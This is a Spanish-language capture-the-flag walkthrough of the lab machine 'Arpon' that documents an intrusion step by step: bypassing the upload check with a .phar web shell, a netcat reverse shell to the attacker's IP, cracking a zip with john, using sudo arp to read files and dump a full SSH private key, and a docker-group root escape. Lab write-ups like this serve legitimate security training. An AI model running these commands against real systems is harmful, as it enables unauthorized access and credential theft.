VulNyx - Arpon

logo

  • File Upload - (Bypass Extension Check)
  • Brute Force Zip File - (JohnTheRipper/User Pivoting)
  • Abusing arp Binary - (id_rsa/User Pivoting 2)
  • Docker Group - (Privesc)

Escaneo de puertos

❯ nmap -p- -sS --min-rate 5000 -vvv -n -Pn 172.0.100.28

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64

Escaneo de servicios

❯ nmap -sVC -p 22,80 172.0.100.28

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 e1:85:8b:7b:6d:a2:6b:1a:ed:18:8e:08:a0:90:87:2a (ECDSA)
|_  256 ad:fe:77:78:a0:57:70:cc:33:68:b5:84:26:a3:b3:63 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Essex
|_http-server-header: Apache/2.4.59 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP TCP - 80

http

Realizo fuerza bruta de directorios

❯ gobuster dir -u 172.0.100.28 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.0.100.28
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 301) [Size: 313] [--> http://172.0.100.28/backup/]
/imagenes             (Status: 301) [Size: 315] [--> http://172.0.100.28/imagenes/]

En el directorio /backup hay una herramienta para subir archivos.

uploader

Subo una imagen png y se sube correctamente.

uploadok

Realizo de nuevo fuerza bruta de directorios para buscar el directorio donde se suben las imágenes.

❯ gobuster dir -u 172.0.100.28/backup -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.0.100.28/backup
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/empty                (Status: 301) [Size: 319] [--> http://172.0.100.28/backup/empty/]
Progress: 175328 / 175330 (100.00%)

Ahora realizo fuerza bruta de extensiones .png en el directorio /empty.

❯ gobuster dir -u 172.0.100.28/backup/empty -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x png
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.0.100.28/backup/empty
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              png
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/debian.png           (Status: 200) [Size: 25182]

Si intento subir un archivo .php me devuelve un error, así que abro BurpSuite, intercepto la petición, modifico el filename debian.png a door.phar, borro el contenido de la imagen y le inserto un código malicioso en php.

burp

En el response veo que se ha subido correctamente ya que al ser una máquina fácil no filtra correctamente todas las extensiones.

response

En este enlace tienes la metodología básica sobre file upload, se puede hacer de forma manual o automática usando el Intruder de Burpsuite, en este enlace podrás ver como se hace. Yo lo he hecho manual porque ya he realizado máquinas similares.

Con curl compruebo que puedo ejecutar comandos remotamente.

❯ curl -s "172.0.100.28/backup/empty/door.phar?cmd=id"
PNG

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Dejo un netcat a la escucha y me mando una shell.

❯ curl -s "172.0.100.28/backup/empty/door.phar?cmd=nc%20-c%20/bin/bash%20172.0.100.25%201234"

Obtengo la shell como usuario www-data.

❯ nc -lvnp 1234
listening on [any] 1234 ...
connect to [172.0.100.25] from (UNKNOWN) [172.0.100.28] 33026
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Una vez realizado el tratamiento para la TTY lanzo un ls -la y veo un directorio oculto con el nombre .hidden.

www-data@arpon:/var/www/html/backup/empty$ ls -la

total 48
drwxr-xr-x 3 www-data www-data  4096 Jun  4 12:33 .
drwxr-xr-x 3 www-data www-data  4096 May 12 22:58 ..
drwxr-xr-x 2 www-data www-data  4096 May 13 23:31 .hidden
-rw-r--r-- 1 www-data www-data 25182 Jun  4 11:53 debian.png
-rw-r--r-- 1 www-data www-data    41 Jun  4 12:08 door.phar
-rw-r--r-- 1 www-data www-data     1 May 12 23:12 index.html

Dentro del directorio oculto contiene un archivo zip.

www-data@arpon:/var/www/html/backup/empty/.hidden$ ls -la
ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 May 13 23:31 .
drwxr-xr-x 3 www-data www-data 4096 Jun  4 12:33 ..
-rw-r--r-- 1 www-data www-data 3090 May 12 23:09 backup_id.zip

Si intento descomprimirlo en la máquina víctima me pide una contraseña que no tengo, pero parece que me proporciona un posible usuario con el nombre calabrote.

www-data@arpon:/var/www/html/backup/empty/.hidden$ unzip backup_id.zip

Archive:  backup_id.zip
[backup_id.zip] id_rsa_calabrote password:

Creo un simple servidor HTTP con python para descargarme el archivo zip.

www-data@arpon:/var/www/html/backup/empty/.hidden$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Lo descargo con wget.

❯ wget 172.0.100.28:8000/backup_id.zip
--2024-06-04 12:48:31--  http://172.0.100.28:8000/backup_id.zip
Connecting to 172.0.100.28:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3090 (3.0K) [application/zip]
Saving to: ‘backup_id.zip’

backup_id.zip             100%[===================================>]   3.02K  --.-KB/s    in 0s      

2024-06-04 12:48:31 (626 MB/s) - ‘backup_id.zip’ saved [3090/3090]

Creo un hash del zip con zip2john.

❯ zip2john backup_id.zip > hash

Con john realizo fuerza bruta al archivo zip y encuentro su contraseña.

❯ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
s*******h        (backup_id.zip)

Descomprimo el archivo y obtengo una llave RSA que pertence al usuario calabrote.

Archive:  backup_id.zip
[backup_id.zip] id_rsa_calabrote password:  
  inflating: id_rsa_calabrote        
  inflating: id_rsa_calabrote.pub

Doy permisos a la llave RSA.

❯ chmod 600 id_rsa_calabrote

Me conecto al sistema.

❯ ssh calabrote@172.0.100.28 -i id_rsa_calabrote
Linux arpon 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

$ bash -i
calabrote@arpon:~$

Lanzo un ls -la al /home para enumerar usuarios del sistema.

calabrote@arpon:~$ ls -la /home
total 16
drwxr-xr-x  4 root      root      4096 may 14 00:03 .
drwxr-xr-x 18 root      root      4096 may 11 22:49 ..
drwx------  3 calabrote calabrote 4096 jun  4 13:09 calabrote
drwx------  5 foque     foque     4096 may 13 21:55 foque

Enumero permisos de sudo.

calabrote@arpon:~$ sudo -l
Matching Defaults entries for calabrote on arpon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User calabrote may run the following commands on arpon:
    (root) NOPASSWD: /usr/sbin/arp

Busco información del binario arp en gtfobins.

gtfobins

Leo el archivo .bash_history.

calabrote@arpon:~$ LFILE=/home/foque/.bash_history
calabrote@arpon:~$ sudo /usr/sbin/arp -v -f "$LFILE"
>> ls -lhF
ls: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 1 of etherfile /home/foque/.bash_history !
>> cat script_net_backup.sh 
cat: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 2 of etherfile /home/foque/.bash_history !
>> chmod 755 script_net_backup.sh 
chmod: `Host' desconocido
arp: cannot set entry on line 3 of etherfile /home/foque/.bash_history !
>> exit
arp: format error on line 4 of etherfile /home/foque/.bash_history !
>> history 
arp: format error on line 5 of etherfile /home/foque/.bash_history !
>> docker run hello-world
docker: `Host' desconocido
arp: cannot set entry on line 6 of etherfile /home/foque/.bash_history !
>> docker container run -it --rm alpine
docker: `Host' desconocido
arp: cannot set entry on line 7 of etherfile /home/foque/.bash_history !
>> docker container ps
docker: `Host' desconocido
arp: cannot set entry on line 8 of etherfile /home/foque/.bash_history !
>> docker container ps -a
docker: `Host' desconocido
arp: cannot set entry on line 9 of etherfile /home/foque/.bash_history !
>> docker container --help
docker: `Host' desconocido
arp: cannot set entry on line 10 of etherfile /home/foque/.bash_history !
>> docker container prune
docker: `Host' desconocido
arp: cannot set entry on line 11 of etherfile /home/foque/.bash_history !
>> docker container ps -a
docker: `Host' desconocido
arp: cannot set entry on line 12 of etherfile /home/foque/.bash_history !
>> docker images 
docker: `Host' desconocido
arp: cannot set entry on line 13 of etherfile /home/foque/.bash_history !
>> history 
arp: format error on line 14 of etherfile /home/foque/.bash_history !
>> cat /etc/crontab 
cat: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 15 of etherfile /home/foque/.bash_history !
>> top
arp: format error on line 16 of etherfile /home/foque/.bash_history !
>> ip addr
ip: `Host' desconocido
arp: cannot set entry on line 17 of etherfile /home/foque/.bash_history !
>> mysql -uroot -pAbc123.. -h 10.1.1.1
mysql: `Host' desconocido
arp: cannot set entry on line 18 of etherfile /home/foque/.bash_history !
>> history 
arp: format error on line 19 of etherfile /home/foque/.bash_history !
>> ss -lntp
ss: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 20 of etherfile /home/foque/.bash_history !
>> ls -lhF /var/www/html/
ls: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 21 of etherfile /home/foque/.bash_history !

En el .bash_history se aprecia que el usuario foque lanza un cat a script_net_backup.sh así que voy a leer ese archivo para ver de que se trata.

calabrote@arpon:~$ LFILE=/home/foque/script_net_backup.sh
calabrote@arpon:~$ sudo /usr/sbin/arp -v -f "$LFILE"
>> #!/bin/sh
>> cd /var/www/html
cd: No existe ninguna dirección asociada al nombre
arp: cannot set entry on line 2 of etherfile /home/foque/script_net_backup.sh !
>> tar czf /tmp/backup.tar.gz
tar: `Host' desconocido
arp: cannot set entry on line 3 of etherfile /home/foque/script_net_backup.sh !
>> scp -i /home/foque/.ssh/id_rsa_foque_script /tmp/backup.tar.gz 10.1.1.1@foque:backups/
scp: `Host' desconocido
arp: cannot set entry on line 4 of etherfile /home/foque/script_net_backup.sh !
>> rm /tmp/backup.tar.gz
rm: `Host' desconocido
arp: cannot set entry on line 5 of etherfile /home/foque/script_net_backup.sh !

En el script puedo ver que en la línea 3 llama a la llave RSA con nombre id_rsa_foque_script, configuro de nuevo la variable LFILE para leer el contenido.

calabrote@arpon:~$ LFILE=/home/foque/.ssh/id_rsa_foque_script
calabrote@arpon:~$ sudo /usr/sbin/arp -v -f "$LFILE"
>> -----BEGIN OPENSSH PRIVATE KEY-----
-----BEGIN: `Host' desconocido
arp: cannot set entry on line 1 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
arp: format error on line 2 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> NhAAAAAwEAAQAAAgEAkVhG0Fz+OiyVplhjGAXj0H/UjTvKIh0mps2VbpnSgGfJFEQvILdd
arp: format error on line 3 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> +9NAQd4rPY393GxElFxms5T5yYGORuTgZZoc8Ch8rJC7GNTLZZIpR8xTiRFuSNwgZlg/4z
arp: format error on line 4 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> ah8vWBEh4vHt5D+WtI4d4dLKcdYOCPPi3FNs1EV529u+QkT/BLiCw82LosaQbttM6FAZJh
arp: format error on line 5 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> DhtJwxLaA7XbMTfRXMnkpEd4DO5hkJ40GqI51EDeIxrFDccxs2MoiHPJyX2gQP2BxSgLm1
arp: format error on line 6 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 2uwX/iLj9ayDoJlRD/qKoJ7wQiJKjsLzKiKbZ/4K24jrNjtm718+hYsrFyKRWhcpIFawzY
arp: format error on line 7 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> qgHrEiL5ulqbWGoZHozOFMThItvU433Ox71oaLAvNh6kxZ8n+2dEwWys6zc8jmajwF0k6x
arp: format error on line 8 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> XUC5S6sv5V0dQ295CfwRrixfOUFtMDX8uHx2ke3V7T2VSRgK89Pb2VyL/4jPSCQEwFivI6
arp: format error on line 9 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> x08GIcKypOa7FBS4Dbgs3F6DQmydD/hnWlT0w+4bep0sPBQf7l0wqC69VhM8Vw8BdoJ1F8
arp: format error on line 10 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> oKfPyBj9srWUV0QdDco2lC62cCBFxqthyUAjOHONCL5XAXgUexBuzQ4LCJOIWISijc6LkR
arp: format error on line 11 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 7/qAo+D773VY080sB0c7cOvpNd5VUbOKPsJOt3nsn0CHRyGXz4/QhDuBNVgLvbGY+q+6yv
arp: format error on line 12 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> kAAAc4V7ULUVe1C1EAAAAHc3NoLXJzYQAAAgEAkVhG0Fz+OiyVplhjGAXj0H/UjTvKIh0m
arp: format error on line 13 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> ps2VbpnSgGfJFEQvILdd+9NAQd4rPY393GxElFxms5T5yYGORuTgZZoc8Ch8rJC7GNTLZZ
arp: format error on line 14 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> IpR8xTiRFuSNwgZlg/4zah8vWBEh4vHt5D+WtI4d4dLKcdYOCPPi3FNs1EV529u+QkT/BL
arp: format error on line 15 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> iCw82LosaQbttM6FAZJhDhtJwxLaA7XbMTfRXMnkpEd4DO5hkJ40GqI51EDeIxrFDccxs2
arp: format error on line 16 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> MoiHPJyX2gQP2BxSgLm12uwX/iLj9ayDoJlRD/qKoJ7wQiJKjsLzKiKbZ/4K24jrNjtm71
arp: format error on line 17 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 8+hYsrFyKRWhcpIFawzYqgHrEiL5ulqbWGoZHozOFMThItvU433Ox71oaLAvNh6kxZ8n+2
arp: format error on line 18 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> dEwWys6zc8jmajwF0k6xXUC5S6sv5V0dQ295CfwRrixfOUFtMDX8uHx2ke3V7T2VSRgK89
arp: format error on line 19 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> Pb2VyL/4jPSCQEwFivI6x08GIcKypOa7FBS4Dbgs3F6DQmydD/hnWlT0w+4bep0sPBQf7l
arp: format error on line 20 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 0wqC69VhM8Vw8BdoJ1F8oKfPyBj9srWUV0QdDco2lC62cCBFxqthyUAjOHONCL5XAXgUex
arp: format error on line 21 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> BuzQ4LCJOIWISijc6LkR7/qAo+D773VY080sB0c7cOvpNd5VUbOKPsJOt3nsn0CHRyGXz4
arp: format error on line 22 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> /QhDuBNVgLvbGY+q+6yvkAAAADAQABAAACAAPGWlcFBi5e+G0cYxoah/dXfAejALXB7JtV
arp: format error on line 23 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> tHUzinCtTQHn1Ib3ogVWCjpgE8eZ8GF5zUi29Iz5/3D3gz2jktdNx9D8lO4rJe9dzI0W3S
arp: format error on line 24 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> k82KYzJIMd6wEjSFesoAVp0UG2BhFFcRJSz0NQqnl9mCqOCn63AoMLN7vP5ihrulsoxpqC
arp: format error on line 25 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 30CX52rTP+CqLYgnAnSnPsejOW4ggxaUPkTyNWZBZ3jgr7SMSMTfONNFldahkImDtPobRx
arp: format error on line 26 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> Xx+bmS8fW7PN/ZhfLr3YAkIPKzFlmvpI5udtyhjTHEnFmsTXVPn25iF0qBL81xWUfkf9zK
arp: format error on line 27 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> GfFzmuUm0AeeXITA9pFo3hJXsmJKKx3pj1bU5QDbiiHWjv8nWdbX6FJ+Yhnq7yes3GMGp2
arp: format error on line 28 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> qXjwIkHxKVV7z5E0FZS0D2+Wcm+vVFknZLAAN90ifbfx8RiYGGBWHIvnpeFAj6zpvgYaf0
arp: format error on line 29 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> l6WwWHeAA/s2jaVwHgMK7rLsIBdQw2MMSDsfhvzQUj2F69VOGge9GQCgPvS3VFb7ADFZwk
arp: format error on line 30 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> G4syMyNN3VFuSnPuByh9x9THPeAbioOav4KFl/7bOm192NcXgtem3jmqb7kKBg78A8qxqp
arp: format error on line 31 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> pIUhG2IaQDgXIBB3lcLF1/SZuRHDHHBw3oDP1FoNR391dcLWaBsqU1FvGGMoDtwlhcxaby
arp: format error on line 32 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> xtUd6aR9nLNIpfNrqVAAABAD/oEehnXYDYwoiCbD8DV17/Ik2c0AZcmM60Mf5y7xBJU3Ij
arp: format error on line 33 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> WpDUXQ8ckGuDPfGJbykrSLzOK+fuGVlyIEzYwjmPR0aVRa6OkWUkKkxuLbZlKaQ2pvnQnm
arp: format error on line 34 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> cSWttPF4xd3aZT5l/YYRX71SgnMm73AUXQlf1oWEkkwYbHDtNU1xY1JdHlJ6hYtgloI38h
arp: format error on line 35 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> EW18AwS53wSeB/3rkpxeyBrseDYeyH6ryHu8zkfsUaAi5uvaN67ZVpB+KZ4cn803kFew1Z
arp: format error on line 36 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> jJkU12ctaO0e8WZGhhnvLdWOOBC6TDBizshU6cK/cwDoP7bx4GaY81vmaOLtJaImtcbz8E
arp: format error on line 37 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 4PpurVzZiXCFA4kAAAEBAMTfHA3jndrHkSnWKmRkVQR+5ih5+s+8gFcE5sUuoyNxN3/Imr
arp: format error on line 38 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> vMgU09uFUqFC5LHv8jww977i8E18GAch6viepqLCNTOPOCI6TG9UPqUUiaU0/17Xd8fvvb
arp: format error on line 39 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> kV62c0ObZs6Tf171BjawAmxryr5mngXCNFxtJVkx9WPoqzsZlqV/5QAZzWbi/eAYTbpEni
arp: format error on line 40 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 3krmg7fKFURt1A7EQPeWE4zQP6z88KiqWndgS4KtS/w/K188CdgXghocBDiI2aQ667RHpx
arp: format error on line 41 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> qiRI5wsf4tGkACn6ZmjInrouQgW6JPb/f/K/lS/EQQ8i2SYffgD0WBjWMkMTdiNfiguJXq
arp: format error on line 42 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> kJLMJipbI8tf8AAAEBALz/bTGz59Y+JVgdbVJbHpcGSoTvtXVTgQYgaiZbGLhkAw707mZV
arp: format error on line 43 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 3udqk/mrvuFfl7x9HgIWDbuv2rRYbcm7O9eMKwq3/a1ZXJD2NbYp3jJk12lNhm+yerrxSx
arp: format error on line 44 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> bvCvypzdfn1arBkO3MN9Ygt5rtq/MEyDBjhrr3++TXgCfsckuHPqM3aYoEgz+cpk5G09Uy
arp: format error on line 45 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 5l1Ldqb3KNl9RE4liPI4+TXfCLIgmqSwiX89D4TxisapDysk1QYwi54ympRsUdXlVnP0Jw
arp: format error on line 46 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 2dtQG9d5tfhrp/OjkDKwVoaVs0NkU66ASstZSjCpLQsFmsru4ULI/5MIphqnS6351nRZAb
arp: format error on line 47 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> 8h0k8uVYLwcAAAADa2V5
arp: format error on line 48 of etherfile /home/foque/.ssh/id_rsa_foque_script !
>> -----END OPENSSH PRIVATE KEY-----
-----END: `Host' desconocido

Creo el archivo foque.txt con el contenido del archivo id_rsa_foque_script para limpiarlo con grep y tr.

cat foque.txt | grep -v -e arp -e Host | tr -d '>>'

Una vez tengo la llave RSA límpia, le doy permisos con chmod y me conecto al sistema como usuario foque.

❯ chmod 600 id_rsa_foque
❯ ssh foque@172.0.100.28 -i id_rsa_foque
Linux arpon 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ bash -i 
foque@arpon:~$

Con id veo que foque es miembro del grupo docker.

foque@arpon:~$ id
uid=1002(foque) gid=1002(foque) grupos=1002(foque),996(docker)

En este enlace me proporciona información para elevar privilegios.

dockerprivesc

Al introducir el oneliner me devuelve una terminal de root.

foque@arpon:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# bash -i
root@303a71a3f53f:/# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
root@303a71a3f53f:/#

Y aquí termina la máquina Arpon.

Saludos!